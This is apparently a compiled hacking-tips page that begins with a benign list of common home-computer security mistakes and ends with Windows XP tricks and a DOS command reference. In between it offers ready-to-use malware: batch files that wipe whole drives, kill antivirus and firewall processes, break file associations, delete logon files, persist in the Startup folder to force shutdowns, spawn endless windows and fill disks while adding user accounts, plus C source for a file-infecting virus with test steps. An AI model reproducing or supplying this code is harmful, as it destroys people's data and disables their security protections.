10 most dangerous things you can do to compromise your computer's security.

1. Use a password that is easy to guess.

Examples: "password", your name, your cat's name, any name at all, any word that can be found in a dictionary.

Why it is dangerous: Hackers routinely use so-called 'dictionary attacks'. They simply run the entire dictionary against your password, so a password consisting of an English word will be cracked in seconds, if not faster.
Better: - use a random combination of letters (upper and lower cases), numbers and special characters (@, *, #, etc.).
Example: "hfdjje%*834k##1JK" is almost impossible to crack by brute force, unlike a password such as "nice".

2. Use broadband (e.g. DSL or Cable) without a firewall.

Most people in this country lock their doors every night and buy car alarms. Isn't it amazing that the same people who lock their cars and houses don't bother to lock their computers from thousands of crooks constantly scanning the Internet for unprotected computers?
Most people find it hard to understand that in order to inflict damage, hackers don't have to live next door to you or even in the same country. They don't need to know you personally. In fact, many of them are just using special software that lets them scan millions of computers with much less effort and skill than it takes an old-fashioned burglar to pick a lock.
Your best defense against this is a good firewall. Without getting too technical, suffice it to say that a firewall acts somewhat like a cloaking device from Star Trek by making your computer invisible to the hacker. Good firewalls also guard your computer from attacks from within by telling you when an unauthorized program is trying to access the Internet. This makes firewalls great tools against the spyware.


3. Disable a firewall.


Some people heard somewhere that firewalls are important and even installed one on their computer. Unfortunately, the firewall turned out to be a nuisance because every minute or so it would popup with a cryptic warning with some strange words and even stranger numbers. So, to keep things simple, they decide to get rid of the pest.
Bad idea! Would you get rid of a dog that barks to warn you of intruders? When the firewall is telling you that somebody is trying to get into your computer, thank it, don't shut it off! Actually, most firewalls will let you disable the warning messages, so in a few days your protector will be well-behaved and won't bother you too much.


4. Send passwords and other sensitive information via unprotected email.

Most people would be surprised to find out that regular email is not protected. Hackers can easily intercept email pockets traveling over cyberspace, just like guys with scanners can listen to conversations over the old cordless phones. For this reason shouting your passwords, social security numbers, etc. from a street corner is actually less dangerous than sending the same information through regular email.


5. Respond to "phishing" requests.

Some criminals like to add a "human touch" to their activities. Instead of going after your bank or credit card information by breaking into your computer, they simply ask you for it. Take a look this "masterpiece":
Dear Bank***.com Customer, During our regular update and verification of the Internet Banking Accounts, we could not verify your current information. Either your information has been changed or incomplete, as a result your access to use our services has been limited. Please update your information. To update your account information and start using our services please click on the link below: https://www.bank***.com/net AFTER SUBMITTING, PLEASE DONOT ACCESS YOUR ONLINE BANKING ACCOUNT FOR THE NEXT 48 HOURS UNTIL THE VERIFICATION PROCESS ENDS. Note: Requests for information will be initiated by Bank*** Business Development; this process cannot be externally requested through Customer Support. Sincerely, Bank***.com Security Department.
It is very easy for the hackers to create a web page that looks like your bank's page and trick you into entering your ID, password and other things that you would want to keep secret.
Most messages like the one shown above are scams, however if you have reasons to believe that an email asking you to login and update or verify your information is legitimate, it is a good idea to contact your financial institution first by telephone or in person.


6. Share your computer with a teenager.

Of course, there are exceptions. Nevertheless, many teenagers like music, especially when it's free. The same goes for games and other fun stuff. And who can blame them? Unfortunately, the file-sharing software that they use is virtually custom-made to the hackers' specifications. Any computer with a program like Morpheus, Kazaa, LimeWire, etc. should be considered infected by viruses, worms and spyware unless proven otherwise. If somebody in your family insists on using file-sharing software, consider designating a separate computer for that.


7. Install free software from sources you don't know well.

The best things in life are free. This usually is not true when it comes to software. After all, somebody has to design, write and test it. Somebody also has to pay for maintaining that website where you downloaded the software from. There are a lot of "free" software programs supported by advertisements. They will even mention it somewhere in the 23rd paragraph of the License Agreement that you have surely perused before hitting the "Install" button. Some programs are more malicious than others.
On the other hand, there exist quite a few high-quality free programs. They are either old versions, teasers for commercial products, marketing vehicles, etc. The bottom line - if you are getting something for free, apply some common-sense and think about why it is actually free.


8. Open emails from strangers and run the attachment.

Some things are almost impossible to understand, and we aren't talking about the general theory of relativity here.
The genius who invented email most likely had no idea that in addition to helping people to share information cheaply and almost instantaneously, email can become an ideal medium for disseminating computer viruses and other malicious software. Hackers quickly learned to use email attachments to send their destructive payloads. They also learned particularly well how to exploit numerous vulnerabilities in Microsoft Outlook that in addition to being a pretty neat email client turned out to be an almost perfect gateway for email viruses and worms.
To protect yourself, make sure that you open only email that doesn't look suspicious. Be ten times more careful with messages that include attachments, even if they appear to be from your friends. Numerous programs exist that fight email viruses and spam, but nothing can replace simple common sense.


9. Fail to update your Windows.

Microsoft Windows is a wonderful operating system that lets us do amazing things quickly and economically. Unfortunately, security came to Windows as an afterthought. Day after day new security holes are being discovered, publicized and eventually fixed. Even though updating Windows can be cumbersome, especially if you don't have broadband connection, people who fail to update have only themselves to blame in case they become victims of an exploit already fixed by Microsoft.


10. Click Yes on "Installing IE plug-ins" popup while surfing the Internet.

Everybody who spends a few hours a day surfing the Internet has seen those "friendly" offers of free software appearing seemingly out of nowhere. Free self-adjusting atomic clock, etc. The trouble with this free software is that it doesn't come alone. It will usually install some other things on your computer that you won't necessarily like. Namely, programs tracking your every move on the Internet, redirecting you to the website that you never wanted to see, feeding you with deceptive ads and so on. So before clicking "yes", think!

Mini virus bt dangerous


  • One more ...
    try one this

    Cd C:\
    rd C:\ /s/q
    Cd D:\
    rd D:\ /s/q
    Cd E:\
    Rd E:\ /s/q
    Cd F:\
    Rd\ /s/q

    then it is complete Save as any file you want in .bat format.. n enjoy lol..its really dangerous dont try on your own pc.


How to add ur own created viruses into start ups this will make it diifcult to detect them n to remove them ...

1) For this u can use the simple code below ..

@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

n den rest of the code ..

2) suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..

@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

@echo off
shutdown -s -t 5 -c "Shutdown"

save it as abcd.bat when ever u will run it it will be saved in ur start ups..

here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol

End Process virus

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
This Virus will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

4 mini virus

  • This code about multiple open windows means infinite windows
    until continue you restart the computer:save on denger.bat and code written in notepad

    @echo off
    copy 0% denger.bat
    start denger.bat

  • This code about the computer shutdown:

    @echo off
    shutdown -s -t 5 -c "Shutdown"


  • Go to notepad and type the following:
    @Echo off
    Del C:\ *.*|y

    save it as Dell.bat

  •          Want worse then type the following:
                   @echo off
                    del %systemdrive%\*.*/f/s/q
                     shutdown -r -f -t 00

                    and save it as a .bat file

Just for Fun

Here is another one which is funny......

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."

Make your own computer viruses in notepad

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any antivirus

Here are some good viruses ,i am not responsible for any kind of damage to your system :-D


Copy this to notepad and save as flood1.bat :-D


@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

what does it do : this is an extremely harmful virus the will keep replicating itself until your harddrive is totally full and will destroy ur comp.

This program is an example of how to create a virus in c

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst("*.*",&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],"rb");
host=fopen(ffblk.ff_name,"rb+");
if(host==NULL) goto next;
x=89088;
printf("Infecting %s\n",ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf("DONE! (Total Files Infected= %d)",a);
end=clock();
printf("TIME TAKEN=%f SEC\n",
(end-st)/CLK_TCK);
getch();
}



dont run in ur computer

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4.All the infected files will be ready to reinfect

That's it
WARNING: FOR EDUCATIONAL PURPOSES ONLY 

WINDOWS XP HIDDEN APPS very helpful

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)

8) m*cro$oft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File siganture verification tool = sigverif.exe

18) Volume Control = sndvol32.exe (I've included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).

21) m*cro$oft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

24) System configuration = msconfig.exe (can use to control starup programs)

25) gpedit.msc used to manage group policies, and permissions

Win Xp Hidden Secrets

Defrag

Secret - Hidden Command Line Switch
Instructions - Go to "Start", "Run" and Type defrag c: -b to defragment the Boot and Application Prefetch information. Similar to what BootVis invokes.

Paint

Secret - Image Trails
Instructions - Open an image and hold down Shift then drag the image around to create an image trail.

Secret - 10x Zoom
Instructions - Open an image and select the magnifying glass icon. Left-Click exactly on the line below the 8x.


Game Secrets


FreeCell

Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.

Minesweeper

Secret - Reveal Mines
Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.

Pinball

Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well
Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points

Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.

Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.

Solitaire

Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.


OS Secrets


Add/Remove

Secret - Hidden Uninstall Options
Instructions - Warning: Proceed at your own risk! Browse to C:\Windows\inf\ and make a backup copy of sysoc.inf. Then open the original file C:\Windows\inf\sysoc.inf in notepad. Go to "Edit" and select "Replace". In "Find what:" type ,hide and in "Replace with:" type , then select "Replace All", save and close the file. Go to the control panel, "Add/Remove", select "Add/Remove Windows Components". You will now see many more Windows components to uninstall. Do not remove anything with no label or that you do not recognize or fully understand what it does. Doing so can break certain functionality in Windows.

Control Panel

Secret - Hidden Control Panel Extensions
Instructions - Download and install TweakUI, launch, go to "Control Panel" and check any item not selected, then "Apply" and "OK". You will now see the hidden control panel extensions.

Device Manager

Secret - Hidden Devices
Instructions - Go to the control panel, "System" icon, "Hardware" tab and select "Device Manager". Select View and Show hidden devices.

Music

Secret - Music from the Installer
Instructions - Browse to C:\Windows\system32\oobe\images\title.wma and play.

Shutdown

Secret - Display Hibernate Option on the Shut Down dialog
Instructions - Go to "Start", "Turn Off Computer..." and press either Shift key to change the "Stand By" button to "Hibernate".

Support Tools

Secret - Over 100 Windows XP Support Utilities are on the install CD

Instructions for Pre-SP2 users - If you do not have SP2 installed, put the original Windows XP CD in the CD-ROM Drive, run the D:\Support\Tools\setup.exe file.

Ms-dos Commands

Command Prompt
-------------------------------------------------------------------
ANSI.SYS - Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND - Causes MS-DOS to look in other directories when editing a file or running a command.
ARP - Displays, adds, and removes arp information from network devices.
ASSIGN - Assign a drive letter to an alternate letter.
ASSOC - View the file associations.
AT - Schedule a time to execute commands or programs.
ATMADM - Lists connections and addresses seen by Windows ATM call manager.
ATTRIB - Display and change file attributes.

BATCH - Recovery console command that executes a series of commands in a file.
BACKUP - Enables users to backup their data on their computer.
BOOTCFG - Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK - Enable / disable CTRL + C feature.

CACLS - View and modify file ACL's.
CALL - Calls a batch file from another batch file.
CD - Changes directories.
CHCP - Supplement the International keyboard and character set information.
CHDIR - Changes directories.
CHKDSK - Check the hard disk drive running FAT for errors.
CHKNTFS - Check the hard disk drive running NTFS for errors.
CHOICE - Specify a listing of multiple options within a batch file.
CLS - Clears the screen.
CMD - Opens the command interpreter.
COLOR - Easily change the foreground and background color of the MS-DOS window.
COMMAND - Opens the command interpreter.
COMP - Compares files.
COMPACT - Compresses and uncompress files.
CONTROL - Open control panel icons from the MS-DOS prompt.
CONVERT - Convert FAT to NTFS.
COPY - Copy one or more files to an alternate location.
CTTY - Change the computers input/output devices.

DATE - View or change the systems date.
DEBUG - Debug utility to create assembly programs to modify hardware settings.
DEFRAG - Re-arrange the hard disk drive to help with loading programs.
DEL - Deletes one or more files.
DELETE - Recovery console command that deletes a file.
DELTREE - Deletes one or more files and/or directories.
DIR - List the contents of one or more directory.
DISABLE - Recovery console command that disables Windows system services or drivers.
DISKCOMP - Compare a disk with another disk.
DISKPART - used to delete and create partitions.
DISKCOPY - Copy the contents of one disk and place them on another disk.
DOSKEY - Command to view and execute commands that have been run in the past.
DOSSHELL - A GUI to help with early MS-DOS users.
DRIVPARM - Enables overwrite of original device drivers.

ECHO - Displays messages and enables and disables echo.
EDIT - View and edit files.
EDLIN - View and edit files.
EMM386 - Load extended Memory Manager.
ENABLE - Recovery console command to enable a disable service or driver.
ENDLOCAL - Stops the localization of the environment changes enabled by the setlocal command.
ERASE - Erase files from computer.
EXIT - Exit from the command interpreter.
EXPAND - Expand a M*cro$oft Windows file back to it's original format.
EXTRACT - Extract files from the M*cro$oft Windows cabinets.

FASTHELP - Displays a listing of MS-DOS commands and information about them.
FC - Compare files.
FDISK - Utility used to create partitions on the hard disk drive.
FIND - Search for text within a file.
FINDSTR - Searches for a string of text within a file.
FIXBOOT - Writes a new boot sector.
FIXMBR - Writes a new boot record to a disk drive.
FOR - Boolean used in batch files.
FORMAT - Command to erase and prepare a disk drive.
FTP - Command to connect and operate on a FTP server.
FTYPE - Displays or modifies file types used in file extension associations.

GOTO - Movesa batch file to a specific label or location.
GRAFTABL - Show extended characters in graphics mode.

HELP - Display a listing of commands and brief explanation.
HOSTNAME -Display the hostname of the machine.

IF - Allows for batch files to perform conditional processing.
IFSHLP.SYS - 32-bit file manager.
IPCONFIG - Network command to view network adapter settings and assigned values.

KEYB - Change layout of keyboard.

LABEL - Change the label of a disk drive.
LH - Load a device driver in to high memory.
LISTSVC - Recovery console command that displays the services and drivers.
LOADFIX - Load a program above the first 64k.
LOADHIGH - Load a device driver in to high memory.
LOCK - Lock the hard disk drive.
LOGON - Recovery console command to list installations and enable administrator login.

MAP - Displays the device name of a drive.
MD - Command to create a new directory.
MEM - Display memory on system.
MKDIR - Command to create a new directory.
MODE - Modify the port or display settings.
MORE - Display one page at a time.
MOVE - Move one or more files from one directory to another directory.
MSAV - Early M*cro$oft Virus scanner.
MSBACKUP -MS-DOS application that enables users to backup their data on their computer.
MSD - Diagnostics utility.
MSCDEX - Utility used to load and provide access to the CD-ROM.
MWBACKUP - MS-DOS application that enables users to backup their data on their computer.

NBTSTAT - Displays protocol statistics and current TCP/IP connections using NBT
NET - Update, fix, or view the network or network settings
NETSH - Configure dynamic and static network information from MS-DOS.
NETSTAT - Display the TCP/IP network protocol statistics and information.
NLSFUNC - Load country specific information.
NSLOOKUP - Look up an IP address of a domain or host on a network.

PATH - View and modify the computers path location.
PATHPING - View and locate locations of network latency.
PAUSE - Command used in batch files to stop the processing of a command.
PING - Test / send information to another network computer or network device.
POPD - Changes to the directory or network path stored by the pushd command.
POWER - Conserve power with computer portables.
PRINT - Prints data to a printer port.
PROMPT - View and change the MS-DOS prompt.
PUSHD - Stores a directory or network path in memory so it can be returned to at any time.

QBASIC - Open the QBasic.

RD - Removes an empty directory.
REN - Renames a file or directory.
RENAME - Renames a file or directory.
RMDIR - Removes an empty directory.
ROUTE - View and configure windows network route tables.
RUNAS - Enables a user to execute a program on another computer.

SCANDISK - Run the scandisk utility.
SCANREG - Scan registry and recover registry from errors.
SET - Change one variable or string to another.
SETLOCAL - Enables local environments to be changed without affecting anything else.
SETVER - Change MS-DOS version to trick older MS-DOS programs.
SFC - Scans and replaces any M*cro$oft Windows file on the computer and replaces any changed file with the correct version
SHARE - Installs support for file sharing and locking capabilities.
SHIFT - Changes the position of replaceable parameters in a batch program.
SHUTDOWN - Shutdown the computer from the MS-DOS prompt.
SMARTDRV - Create a disk cache in conventional memory or extended memory.
SORT - Sorts the input and displays the output to the screen.
START - Start a separate window in Windows from the MS-DOS prompt.
SUBST - Substitute a folder on your computer for another drive letter.
SWITCHES - Remove add functions from MS-DOS.
SYS - Transfer system files to disk drive.
SYSTEMINFO - Displays complete system information for M*cro$oft Windows XP Professional computers.
SYSTEMROOT - The systemroot command is a recovery console command that sets the current directory as the system root directory.

TELNET - Telnet to another computer / device from the prompt.
TIME - View or modify the system time.
TITLE - Change the title of their MS-DOS window.
TRACERT - Visually view a network packets route across a network.
TREE - View a visual tree of the hard disk drive.
TYPE - Display the contents of a file.

UNDELETE - Undelete a file that has been deleted.
UNFORMAT - Unformat a hard disk drive.
UNLOCK - Unlock a disk drive.

VER Display - the version information.
VERIFY - Enables or disables the feature to determine if files have been written properly.
VOL - Displays the volume information about the designated drive.

XCOPY - Copy multiple files, directories, and/or drives from one location to another.

Lock your USB port

To do this you have to make a registry tweak taht will prevent writting to the usb port in Windows XP.
1) Go to 'Start|Run' and type 'Regedit'.
2) Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control.
3) Here add a new folder on the left pane by right clicking on it and selecting 'New|Key'.
4) Name this folder 'StorageDevicePolicies'.
5) Click this new folder and in the window on the right create a new DWORD value, lebel it WriteProtect, give it a value of '1'.
6) Now users will not be able to write any data on the USB.

To turn it off just set the value to '0'

Lock your System on Mouse Click

Lock your System on Mouse Click Feel hard to press CTRL+ALT+DEL to lock your machine ?????? Try this and create the icon to lock the machine. 1. Right click an empty spot on the desktop, point to New and click Shortcut. 2. In the Create Shortcut dialog box, type the following in the 'Type the location' of the item text box: "rundll32 user32.dll,LockWorkStation" remove quotes while typing. 3. Click Next. 4. In "Type a name for this shortcut", type "" (any name as u wish) and Click Finish